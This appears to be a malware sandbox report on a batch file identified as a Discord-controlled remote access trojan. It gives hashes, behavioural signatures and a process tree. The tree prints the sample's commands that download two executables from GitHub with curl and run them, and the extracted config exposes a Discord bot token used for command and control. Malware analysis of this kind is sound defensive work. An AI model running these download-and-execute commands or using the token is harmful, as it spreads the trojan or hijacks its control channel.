Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
213s -
max time network
215s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
29/06/2024, 10:53
Static task
static1
Behavioral task
behavioral1
Sample
Sharp CS V1.bat
Resource
win11-20240611-en
Errors
General
-
Target
Sharp CS V1.bat
-
Size
433B
-
MD5
79f4dfedde066329feb0c23b9a95920d
-
SHA1
470bd43b15f11f0583e5357c1f8223ed688559b0
-
SHA256
5051740849cc567c88d930dbff64dbe995f400c68a2f8c25a38ccdd9f2b81359
-
SHA512
a5270495d09ade0056166b26cfb25be796bbf41e96639f3c69011eb1f4433829426f99e0878fcb882e0ccae91e2023cdf01ffb0c5dd22a7ce0f58eb5a09ccd5d
Malware Config
Extracted
discordrat
-
discord_token
MTI0MzQwMDg0MDc3NDE2MDM4NQ.GC8XoW.GV37ZmiRqKTJrla6I_LG3ievGgv1WoBnOGAfMw
-
server_id
1256556741160599562
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4980 Packages.exe 1776 System.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 18 raw.githubusercontent.com 22 discord.com 24 discord.com 11 raw.githubusercontent.com 12 raw.githubusercontent.com 16 discord.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3356 cmd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\System64\Packages.exe curl.exe File created C:\Program Files\System64\System.exe curl.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1776 System.exe Token: SeShutdownPrivilege 1776 System.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2688 OpenWith.exe 2880 OpenWith.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 3092 wrote to memory of 3148 3092 cmd.exe 79 PID 3092 wrote to memory of 3148 3092 cmd.exe 79 PID 3092 wrote to memory of 4632 3092 cmd.exe 82 PID 3092 wrote to memory of 4632 3092 cmd.exe 82 PID 3092 wrote to memory of 4980 3092 cmd.exe 83 PID 3092 wrote to memory of 4980 3092 cmd.exe 83 PID 3092 wrote to memory of 4980 3092 cmd.exe 83 PID 3092 wrote to memory of 1776 3092 cmd.exe 84 PID 3092 wrote to memory of 1776 3092 cmd.exe 84 PID 4980 wrote to memory of 1136 4980 Packages.exe 86 PID 4980 wrote to memory of 1136 4980 Packages.exe 86 PID 4980 wrote to memory of 1136 4980 Packages.exe 86 PID 1136 wrote to memory of 2536 1136 cmd.exe 87 PID 1136 wrote to memory of 2536 1136 cmd.exe 87 PID 1136 wrote to memory of 2536 1136 cmd.exe 87 PID 4980 wrote to memory of 2660 4980 Packages.exe 88 PID 4980 wrote to memory of 2660 4980 Packages.exe 88 PID 4980 wrote to memory of 2660 4980 Packages.exe 88 PID 4980 wrote to memory of 1780 4980 Packages.exe 89 PID 4980 wrote to memory of 1780 4980 Packages.exe 89 PID 4980 wrote to memory of 1780 4980 Packages.exe 89 PID 4980 wrote to memory of 4712 4980 Packages.exe 90 PID 4980 wrote to memory of 4712 4980 Packages.exe 90 PID 4980 wrote to memory of 4712 4980 Packages.exe 90 PID 4980 wrote to memory of 3356 4980 Packages.exe 91 PID 4980 wrote to memory of 3356 4980 Packages.exe 91 PID 4980 wrote to memory of 3356 4980 Packages.exe 91 PID 3356 wrote to memory of 3128 3356 cmd.exe 92 PID 3356 wrote to memory of 3128 3356 cmd.exe 92 PID 3356 wrote to memory of 3128 3356 cmd.exe 92 PID 4980 wrote to memory of 4752 4980 Packages.exe 93 PID 4980 wrote to memory of 4752 4980 Packages.exe 93 PID 4980 wrote to memory of 4752 4980 Packages.exe 93 PID 4980 wrote to memory of 3876 4980 Packages.exe 94 PID 4980 wrote to memory of 3876 4980 Packages.exe 94 PID 4980 wrote to memory of 3876 4980 Packages.exe 94 PID 4980 wrote to memory of 4792 4980 Packages.exe 95 PID 4980 wrote to memory of 4792 4980 Packages.exe 95 PID 4980 wrote to memory of 4792 4980 Packages.exe 95 PID 4980 wrote to memory of 2784 4980 Packages.exe 96 PID 4980 wrote to memory of 2784 4980 Packages.exe 96 PID 4980 wrote to memory of 2784 4980 Packages.exe 96 PID 4980 wrote to memory of 2064 4980 Packages.exe 97 PID 4980 wrote to memory of 2064 4980 Packages.exe 97 PID 4980 wrote to memory of 2064 4980 Packages.exe 97 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3128 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sharp CS V1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\system32\curl.execurl -LJO https://github.com/LongYears9/tools/raw/master/System.exe2⤵
- Drops file in Program Files directory
PID:3148
-
-
C:\Windows\system32\curl.execurl -LJO https://github.com/LongYears9/tools/raw/master/Packages.exe2⤵
- Drops file in Program Files directory
PID:4632
-
-
C:\Program Files\System64\Packages.exe"C:\Program Files\System64\Packages.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mode con:cols=0120 lines=00303⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\mode.commode con:cols=0120 lines=00304⤵PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c title Window Title3⤵PID:2660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\myfiles" mkdir "C:\Users\Admin\AppData\Local\Temp\myfiles"3⤵PID:1780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Admin\AppData\Local\Temp\wtmpd"3⤵PID:4712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd4⤵
- Views/modifies file attributes
PID:3128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\i6.t3⤵PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\i6.bat3⤵PID:3876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c3⤵PID:4792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:2784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c3⤵PID:2064
-
-
-
C:\Program Files\System64\System.exe"C:\Program Files\System64\System.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:4812
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:4712
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵PID:4900
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2688
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
83KB
MD5e155e62ecf5be9131dadecb19213a92a
SHA19ed3d1543b037e901c8870bd360bd5d65e15bda1
SHA25670e2268a76050c6354ad22b0b997a41a48d7148219f6459acd44aadabe3bc500
SHA512fdc30e0fc2d98b27a7fd145247373e5a38856cacaf6f6f66f2716175a4e2ced25f7383a1a42c2c8863a937a345362748575db4a65945e29c3f787975e1402959
-
Filesize
78KB
MD53932b3da37a4b1ac396d52d624fd6c10
SHA192d9336e29373c317ab8c02005e6652f9515c63f
SHA256d5b7c44ebd777e47a77ab3d8749b1c0de91c0c463cc525dd6fd57b7e9604ebab
SHA512d0b43e227232b26032d15bc7430cfd90ef76629ee0064aa61c0585fe6465214801459a2108f5dc16d71dc5d0ee309d2afa28609d1a70f89d031437167b1c33c6
-
Filesize
173B
MD50f8f70e88009593eefaa155a8e31b1d6
SHA1eabcc3f2135e0919e9456da0a4b1084f3382d4b6
SHA256941c169c07670650fc6c6148c1cae068b69bac209e05010594e164aafc7cdf8b
SHA51294df468b963f3c9d133a25e1ffa57039fac01fe960f0f738552ca6440e6242ff48d0b410fe70dd05a62e4842c925c9f2b0220ca9eb9cb4ff5490ada443c9a750
-
Filesize
3B
MD5a5ea0ad9260b1550a14cc58d2c39b03d
SHA1f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA5127c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74